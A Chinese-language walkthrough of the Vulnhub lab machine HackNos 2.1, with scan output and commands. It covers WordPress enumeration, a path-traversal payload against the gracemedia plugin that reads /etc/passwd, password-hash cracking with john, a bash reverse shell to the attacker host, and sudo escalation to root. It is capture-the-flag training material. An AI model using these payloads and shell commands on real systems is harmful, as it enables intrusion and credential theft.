Vulnhub之HackNos 2靶机详细测试过程
HackNos 2作者:jason huawen
靶机信息
名称:hackNos: Os-hackNos-2.1
地址:
https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count LenMAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60Unknown vendor
192.168.56.10008:00:27:8e:0a:96 1 60PCS Systemtechnik GmbH
192.168.56.25408:00:27:0a:ef:c3 1 60PCS Systemtechnik GmbH 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 20:58 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.000069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94364e716a83e2c11ea9526445f62980 (RSA)
| 256 b4ce5ac33f4052a6efdcd829f32cb5d1 (ECDSA)
|_256 096c17a1a3b4c778b9adecde8f64b17b (ED25519)
80/tcp openhttp Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:0A:EF:C3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 secondsNMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-03-24 21:00:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5978e3d67036e, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ Uncommon header 'link' found, with multiple values: (<http://192.168.56.254/tsweb/index.php/wp-json/>; rel="https://api.w.org/",<http://192.168.56.254/tsweb/>; rel=shortlink,)
+ /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-03-24 21:01:35 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testednikto工具识别到/tsweb/目录,访问该目录,从返回页面可知该站点为wordpress
──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,php,js,html,txt
[+] Timeout: 10s
===============================================================
2023/03/24 21:03:25 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403)
/.php (Status: 403)
/index.html (Status: 200)
/.php (Status: 403)
/.html (Status: 403)
/server-status (Status: 403)
Progress: 1313804 / 1323366 (99.28%)===============================================================
2023/03/24 21:04:25 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ gobuster dir -u http://192.168.56.254/tsweb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/tsweb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,php,js
[+] Timeout: 10s
===============================================================
2023/03/24 21:10:22 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403)
/.html (Status: 403)
/index.php (Status: 301) [--> http://192.168.56.254/tsweb/]
/wp-content (Status: 301) [--> http://192.168.56.254/tsweb/wp-content/]
/wp-login.php (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301) [--> http://192.168.56.254/tsweb/wp-includes/]
/readme.html (Status: 200)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301) [--> http://192.168.56.254/tsweb/wp-admin/]
/xmlrpc.php (Status: 405)
/.html (Status: 403)
/.php (Status: 403)
/wp-signup.php (Status: 302) [--> http://192.168.56.254/tsweb/wp-login.php?action=register]
Progress: 1319393 / 1323366 (99.70%)===============================================================
2023/03/24 21:11:24 Finished
==============================================================接下来用wpscan工具扫描站点,看是否可以识别出用户名和插件可被利用。
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ wpscan --url http://192.168.56.254/tsweb/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / /__ \ / ____|
\ \/\/ /| |__) | (___ _____ _ _ __ ®
\ \/\/ / |___/ \___ \ / __|/ _` | '_ \
\/\/| | ____) | (__| (_| | | | |
\/\/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
It seems like you have not updated the database for some time.
[?] Do you want to update now? es o, default:
[+] URL: http://192.168.56.254/tsweb/
[+] Started: Fri Mar 24 21:12:36 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.254/tsweb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|- http://codex.wordpress.org/XML-RPC_Pingback_API
|- https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
|- https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
|- https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
|- https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.254/tsweb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.254/tsweb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.254/tsweb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|- https://www.iplocation.net/defend-wordpress-from-ddos
|- https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3 identified (Insecure, released on 2019-11-12).
| Found By: Rss Generator (Passive Detection)
|- http://192.168.56.254/tsweb/index.php/feed/, <generator>https://wordpress.org/?v=5.3</generator>
|- http://192.168.56.254/tsweb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/style.css?ver=1.0
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
|- http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/style.css?ver=1.0, Match: 'Version: 1.0'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
Plugin(s) Identified:
[+] gracemedia-media-player
| Location: http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/
| Latest Version: 1.0 (up to date)
| Last Updated: 2013-07-21T15:09:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|- http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
|- http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
User(s) Identified:
[+] user
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
|Wp Json Api (Aggressive Detection)
| - http://192.168.56.254/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
|Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Mar 24 21:12:39 2023
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 14.627 KB
[+] Data Received: 449.523 KB
[+] Memory used: 242.609 MB
[+] Elapsed time: 00:00:03wpscan工具识别出用户名user,以及插件:gracemedia-media-player,该插件有漏洞可利用本地文件包含漏洞,在尝试利用该漏洞之前,看是否可以破解出user的密码:
https://www.exploit-db.com/exploits/46537─(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ wpscan --url http://192.168.56.254/tsweb/ -U user -P /usr/share/wordlists/rockyou.txt运行了17分钟仍然无果,暂时放弃。
接下来看如何利用插件的漏洞,漏洞利用位置:
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwdhttp://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd得到返回内容:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/用john破解
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt flag_hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) )
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
topsecret (?)
1g 0:00:00:00 DONE (2023-03-24 21:44) 12.50g/s 81600p/s 81600c/s 81600C/s heybaby..nick123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ cat flag_hash
$1$flag$vqjCxzjtRc7PofLYS2lWf/──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ ssh flag@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:rIQkBhqHj9tWiuhz+gMT5Zzwq4h/22qu5apja7gnWY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/)? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
flag@192.168.56.254's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation:https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Mar 25 01:45:33 UTC 2023
System load:0.07 Processes: 126
Usage of /: 48.6% of 9.78GB Users logged in: 0
Memory usage: 30% IP address for enp0s3: 192.168.56.254
Swap usage: 0%
5 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Could not chdir to home directory /home/flag: No such file or directory
flag@hacknos:/$ id
uid=1001(flag) gid=1003(flag) groups=1003(flag)
flag@hacknos:/$ 成功登录到用户flag
flag@hacknos:/$ cd /home
-rbash: cd: restricted
flag@hacknos:/$ 这是一个受限的shell
用下述方法spawn一个新的shell
flag@hacknos:/$ bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ sudo nc -nlvp 5555
password for kali:
listening on 5555 ...
connect to from (UNKNOWN) 52720
flag@hacknos:/$ id
id
uid=1001(flag) gid=1003(flag) groups=1003(flag)
flag@hacknos:/$ cd /home
cd /home
flag@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x3 rootroot4.0K Nov 172019 .
drwxr-xr-x 24 rootroot4.0K Nov 172019 ..
drwxr-x--x4 rohit rohit 4.0K Nov 172019 rohit
flag@hacknos:/home$ cd rohit
cd rohit
flag@hacknos:/home/rohit$ ls -alh
ls -alh
ls: cannot open directory '.': Permission denied
flag@hacknos:/home/rohit$ cd ..
cd ..
flag@hacknos:/home$ flag@hacknos:/var/backups/passbkp$ cat md5-hash
cat md5-hash
$1$rohit$01Dl0NQKtgfeL08fGrggi0再用john工具破解
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ vim md5_hash
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt md5_hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) )
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!%hack41 (?)
1g 0:00:01:03 DONE (2023-03-24 21:53) 0.01563g/s 220430p/s 220430c/s 220430C/s !(3(r3@m..!##^%^
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 这应该是用户rohit的密码,切换到该用户:
flag@hacknos:/var/backups/passbkp$ su - rohit
su - rohit
su: must be run from a terminal
flag@hacknos:/var/backups/passbkp$ which python
which python
/usr/bin/python
flag@hacknos:/var/backups/passbkp$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
flag@hacknos:/var/backups/passbkp$ su - rohit
su - rohit
Password: !%hack41
rohit@hacknos:~$ id
id
uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
rohit@hacknos:~$ 提权
rohit@hacknos:~$ sudo -l
sudo -l
password for rohit: !%hack41
Matching Defaults entries for rohit on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User rohit may run the following commands on hacknos:
(ALL : ALL) ALL
rohit@hacknos:~$ sudo /bin/bash
sudo /bin/bash
root@hacknos:~# cd /root
cd /root
root@hacknos:/root# ls -alh
ls -alh
total 48K
drwx------5 root root 4.0K Nov 172019 .
drwxr-xr-x 24 root root 4.0K Nov 172019 ..
-rw-------1 root root 1.9K Nov 172019 .bash_history
-rw-r--r--1 root root 3.1K Apr92018 .bashrc
drwx------2 root root 4.0K Nov 172019 .cache
drwx------3 root root 4.0K Nov 172019 .gnupg
-rw-r--r--1 root root148 Aug 172015 .profile
-rw-r--r--1 root root 1.1K Nov 172019 root.txt
drwx------2 root root 4.0K Nov 172019 .ssh
-rw-------1 root root11K Nov 172019 .viminfo
root@hacknos:/root# cat root.txt
cat root.txt
_______ __ ____ #
/ \ /| /|/| #
$$$$$$$|______ ______ _$$ |_ _$$ |$$ |_ #
$$ |__$$ | / \/ \ / $$ | / $$$$ |#
$$ $$< /$$$$$$|/$$$$$$|$$$$$$/ $$$$$$$$$$/ #
$$$$$$$|$$ |$$ |$$ |$$ |$$ | __ / $$$$ |#
$$ |$$ |$$ \__$$ |$$ \__$$ |$$ |/| $$$$$$$$$$/ #
$$ |$$ |$$ $$/ $$ $$/ $$$$/ $$ |$$ | #
$$/ $$/$$$$$$/ $$$$$$/ $$$$/ $$/ $$/ #
#############################################################
#############################################################
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Blog : www.hackNos.com
Author : Rahul Gehlaut
linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
root@hacknos:/root# 至此提权成功,并拿到了root flag
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]